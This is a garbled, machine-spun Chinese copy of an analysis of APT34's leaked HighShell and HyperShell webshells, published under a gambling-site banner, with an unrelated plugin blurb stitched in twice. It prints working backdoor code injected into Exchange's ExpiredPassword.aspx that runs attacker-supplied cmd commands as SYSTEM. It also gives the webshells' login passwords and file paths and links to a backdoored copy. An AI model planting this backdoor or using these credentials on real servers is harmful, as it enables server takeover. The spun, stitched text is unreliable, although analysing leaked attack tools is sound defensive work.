对APT34泄漏对象的剖析——HighShell和HyperShell | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

对APT34泄漏对象的剖析——HighShell和HyperShell

申博_安全预警 申博 245次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

0x00 媒介

近来APT34的6款对象被泄漏,本文作为剖析文章的第二篇(第一篇文章回忆),仅在手艺角度对个中的HighShell和HyperShell举行剖析。

0x01 简介

本文将要引见以下内容:

· 对HighShell的剖析

· 对HyperShell的剖析

· 小结

0x02 对HighShell的剖析

对应泄漏文件的名称为Webshells_and_Panel中的HighShell。

个中的文件为HighShell.aspx,是针对Windows服务器的webshell。

默许接见页面以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

Login框为赤色,须要输入衔接口令。

准确的口令为Th!sN0tF0rFAN。

输入准确的口令后,点击Do it,革新页面,胜利登录,以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

Login框变成绿色。

该对象的公然线索:

TwoFace Webshell: Persistent Access Point for Lateral Movement

HighShell同paloaltonetworks在文中提到的TwoFace的页面雷同。

0x03 对HyperShell的剖析

对应泄漏文件的名称为Webshells_and_Panel中的HyperShell。

下面包罗7个文件夹:

· ExpiredPasswordTech

· HyperShell

· Image

· Libraries

· packages

· ShellLocal

· StableVersion

1.ExpiredPasswordTech

包孕3个文件:

· error4.aspx,功用与HighShell.aspx雷同,但登录口令未知

· ExpiredPassword.aspx,适用于Exchange的webshell

· MyMaster.aspx,天生字符串:NxKK<TjWN^lv-$*UZ|Z-H;cGL(O>7a

2.HyperShell

包罗多个文件,是各个webshell的源码文件。

个中包罗另一个可用的webshell,相对途径:.\Webshells_and_Panel\HyperShell\HyperShell\Shell\simple.aspx

衔接口令:MkRg5dm8MOk。

以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

3.Image

图片文件夹。

Karta:一款新的二进制文件分析和对比插件

前言 “Karta”(在俄语中的意思是“map”)是IDA(一个静态反编译程序)的源代码辅助二进制对比插件,该插件的开发是为了对比一个非常大的二进制文件(通常是固件文件)中的开源库的符号。对于那些每天都要处理固件文件的人来说,重复逆

4.Libraries

包罗多个依靠文件。

5.packages

包罗多个依靠文件。

6. ShellLocal

空文件夹。

7. StableVersion

稳固版本,包罗多个webshell。

(1)ExpiredPassword.aspx

适用于Exchange的webshell。

相对途径:.\Webshells_and_Panel\HyperShell\StableVersion\HighShell v5.0\HyperShell\HyperShell\ExpiredPasswordTech

与相对途径.\Webshells_and_Panel\HyperShell\ExpiredPasswordTech下的文件内容雷同。

ExpiredPassword.aspx是Exchange一般的功用,对应重置用户口令的页面,以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

接见的URL:https://<domain>/owa/auth/ExpiredPassword.aspx

对应Windows绝对途径:C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ExpiredPassword.aspx

该途径下的webshell默许权限为System

我的测试体系安装了Exchange2013,一般的ExpiredPassword.aspx源码我已上传至github:

https://raw.githubusercontent.com/3gstudent/test/master/ExpiredPassword.aspx(2013)

HyperShell中的ExpiredPassword.aspx是一个增加了后门代码的文件,同我测试情况的一般ExpiredPassword.aspx文件比拟有多处分歧,以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

经由剖析发现有多是Exchange版本差别致使的,疏忽版本差别,HyperShell中的ExpiredPassword.aspx重要增加了以下代码:

              <%
                    try{
                    if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form["newPwd1"])) + "[email protected]#!%FS"))) == "+S6Kos9D/etq1cd///fgTarVnUQ=")
                    {
                        System.Diagnostics.Process p = new System.Diagnostics.Process();
                        System.Diagnostics.ProcessStartInfo i = p.StartInfo;
                        i.FileName = "cmd";
                        i.Arguments = "/c " + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form["newPwd2"]));
                        i.UseShellExecute = false;
                        i.CreateNoWindow = true;
                        i.RedirectStandardOutput = true;
                        p.Start();
                        string r = p.StandardOutput.ReadToEnd();
                        p.WaitForExit();
                        p.Close();
                        Response.Write("<pre>" + Server.HtmlEncode(r) + "</pre>");
                        Response.End();
                    }}catch{}
                %>

对应到我的测试情况,也就是Exchange2013,增加payload后的代码已上传至github:

https://raw.githubusercontent.com/3gstudent/test/master/ExpiredPassword.aspx(2013)(HyperShell)

运用要领以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

New password项对应登录webshell的考证口令,考证经由过程后会实行Confirm new password项的内容,权限为System。

泄漏的文件中未提到webshell的考证口令,为了考证该后门,我们修正代码去掉登录webshell的考证环节便可。

(2)HighShellLocal

功用强大的webshell。

相对途径:.\Webshells_and_Panel\Webshells_and_Panel\HyperShell\StableVersion\HighShell v5.0\HyperShell\HyperShell\ShellLocal\StableVersions\ShellLocal-v8.8.5.rar

解压到以后目次,相对途径为.\ShellLocal-v8.8.5\ShellLocal-v8.8.5\HighShellLocal,包孕以下文件:

· 文件夹css

· 文件夹files

· 文件夹js

· HighShellLocal.aspx

实际运用时,还须要.\ShellLocal-v8.8.5\ShellLocal-v8.8.5\下的bin文件夹,不然提醒没法运用Json。

完全构造以下:

│ HighShellLocal.aspx │ ├───bin │ Newtonsoft.Json.dll │ ├───css │ │ main.css │ │ │ └───img │ box-zipper.png │ download-cloud.png │ exclamation-diamond.png │ heart-break.png │ heart-empty.png │ heart.png │ minus-button.png │ ├───files │ 7za.exe │ nbt.exe │ rx.exe │ └───js │ explorer.js │ main.js │ send.js │ utility.js │ ├───components │
├───jquery │
└───semantic

登录口令:Th!sN0tF0rFAN

登录页面以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

输入准确的登录口令后,以下图:

对APT34泄漏对象的剖析——HighShell和HyperShell

能够看到该webshell支撑多个功用。

0x04 小结

本文对泄漏文件中的HighShell和HyperShell举行了剖析,个中HyperShell中的ExpiredPassword.aspx是一个对照隐藏的webshell,目前为止我还未在公然材料中找到这类应用要领。

Karta:一款新的二进制文件分析和对比插件

前言 “Karta”(在俄语中的意思是“map”)是IDA(一个静态反编译程序)的源代码辅助二进制对比插件,该插件的开发是为了对比一个非常大的二进制文件(通常是固件文件)中的开源库的符号。对于那些每天都要处理固件文件的人来说,重复逆


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明对APT34泄漏对象的剖析——HighShell和HyperShell
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址